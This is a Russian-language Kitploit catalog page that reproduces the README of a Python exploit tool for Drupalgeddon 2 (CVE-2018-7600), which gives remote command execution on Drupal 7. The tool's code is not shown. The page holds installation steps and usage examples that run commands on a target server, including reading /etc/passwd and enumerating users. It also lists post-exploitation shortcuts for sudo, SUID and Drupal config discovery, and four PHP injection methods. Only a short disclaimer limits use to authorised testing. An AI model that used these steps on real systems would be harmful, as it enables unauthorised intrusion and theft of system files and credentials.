Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Drupalgeddon2-CVE-2018-7600 — Python-эксплойт для CVE-2018-7600 (Drupalgeddon 2), обеспечивающий удалённое выполнение кода на Drupal 7 с несколькими методами инъекций и предопределёнными командами для Linux и Windows. | Kitploit
Инструменты/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Python-эксплойт для CVE-2018-7600 (Drupalgeddon 2), обеспечивающий удалённое выполнение кода на Drupal 7 с несколькими методами инъекций и предопределёнными командами для Linux и Windows.

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 Описание

bixi.py — эксплойт для уязвимости CVE‑2018‑7600 (Drupalgeddon 2), затрагивающей Drupal 7. Позволяет удалённо выполнять команды (RCE) на уязвимых серверах Drupal через интуитивно понятный интерфейс с предопределёнными командами.


⚠️ DISCLAIMER / ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ

ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДНАЗНАЧЕНО ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И ИССЛЕДОВАТЕЛЬСКИХ ЦЕЛЕЙ В КОНТРОЛИРУЕМЫХ СРЕДАХ.

  • Используйте только в системах, которыми владеете или на тестирование которых имеете письменное разрешение
  • Несанкционированное использование НЕЗАКОННО и может повлечь уголовную ответственность
  • Автор не несёт ответственности за неправомерное использование данного инструмента
  • Всегда соблюдайте местные и международные законы о кибербезопасности

"С большой силой приходит большая ответственность"


📋 Возможности

  • ✅ Автоматическая эксплуатация CVE‑2018‑7600
  • ✅ Предопределённые команды для Linux и Windows
  • ✅ Несколько методов инъекции (system, passthru, exec, shell_exec)
  • ✅ Интуитивно понятный интерфейс со встроенной справкой
  • ✅ Надёжная обработка ошибок и таймаутов
  • ✅ Форматированный и легко читаемый вывод

  • 🚀 Быстрая установка

    1. Клонирование репозитория

    root@kitploit:~
    git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
    cd Drupalgeddon2-CVE-2018-7600
    

    2. Установка зависимостей

    root@kitploit:~
    # Kali / Debian / Ubuntu
    sudo apt update
    sudo apt install python3 python3-pip -y
    pip3 install requests
    
    # Другие дистрибутивы
    pip3 install requests
    

    3. Установка прав на выполнение

    root@kitploit:~
    chmod +x bixi.py
    

    🎯 Базовое использование

    Просмотр полной справки

    root@kitploit:~
    python3 bixi.py --help
    

    Общий синтаксис

    root@kitploit:~
    python3 bixi.py <URL> <КОМАНДА/КЛЮЧЕВОЕ_СЛОВО> [INJECTION_TYPE]
    

    Практические примеры

    root@kitploit:~
    # Проверка уязвимости
    python3 bixi.py http://10.99.99.6/drupal/ test
    
    # Определение операционной системы
    python3 bixi.py http://10.99.99.6/drupal/ linux
    python3 bixi.py http://10.99.99.6/drupal/ windows
    
    # Перечисление пользователей
    python3 bixi.py http://10.99.99.6/drupal/ users_linux
    python3 bixi.py http://10.99.99.6/drupal/ net_user
    
    # Информация о системе
    python3 bixi.py http://10.99.99.6/drupal/ ifconfig
    python3 bixi.py http://10.99.99.6/drupal/ ipconfig
    
    # Пользовательские команды
    python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
    python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
    

    📊 Предопределённые ключевые слова

    🐧 Linux

    КомандаОписание
    linuxИнформация о системе
    users_linuxСписок пользователей
    idИнформация о пользователе/группе
    lsСписок файлов
    ifconfigСетевая информация
    find_flagПоиск флагов

    🪟 Windows

    КомандаОписание
    windowsИнформация о системе
    net_userСписок пользователей
    whoami_winДетальная информация
    ipconfigСеть
    netstat_winСоединения
    dirСписок каталога

    🔧 Пентестинг

    КомандаОписание
    sudoПроверка привилегий sudo
    suidПоиск SUID-бинарников
    net_localgroupЛокальные группы
    drupal_configПоиск конфигураций
    drupal_versionПолучение версии Drupal

    🎨 Методы инъекции

    root@kitploit:~
    # system (по умолчанию)
    python3 bixi.py http://target/ "whoami" system
    
    # passthru
    python3 bixi.py http://target/ "whoami" passthru
    
    # exec
    python3 bixi.py http://target/ "whoami" exec
    
    # shell_exec
    python3 bixi.py http://target/ "whoami" shell_exec
    

    🏗️ Структура проекта

    root@kitploit:~
    drupalgeddon2-exploit/
    │
    ├── bixi.py
    ├── README.md
    ├── requirements.txt
    ├── examples/
    │   ├── linux_commands.txt
    │   └── windows_commands.txt
    └── screenshots/
        ├── help_screen.png
        └── exploit_success.png
    

    🔧 Расширенная настройка

    Прокси (опционально)

    root@kitploit:~
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    

    Таймаут

    Изменение значения по умолчанию (15 секунд):

    root@kitploit:~
    timeout=15
    

    Добавление новых команд

    Отредактируйте словарь commands в get_command_for_keyword()


    🐛 Решение проблем

    Ошибка: No module named 'requests'

    root@kitploit:~
    pip3 install requests
    

    Ошибка: Connection refused

    root@kitploit:~
    # Проверка связности
    ping TARGET_IP
    
    # Проверка пути к Drupal
    curl http://TARGET_IP/drupal/
    
    Скачать инструмент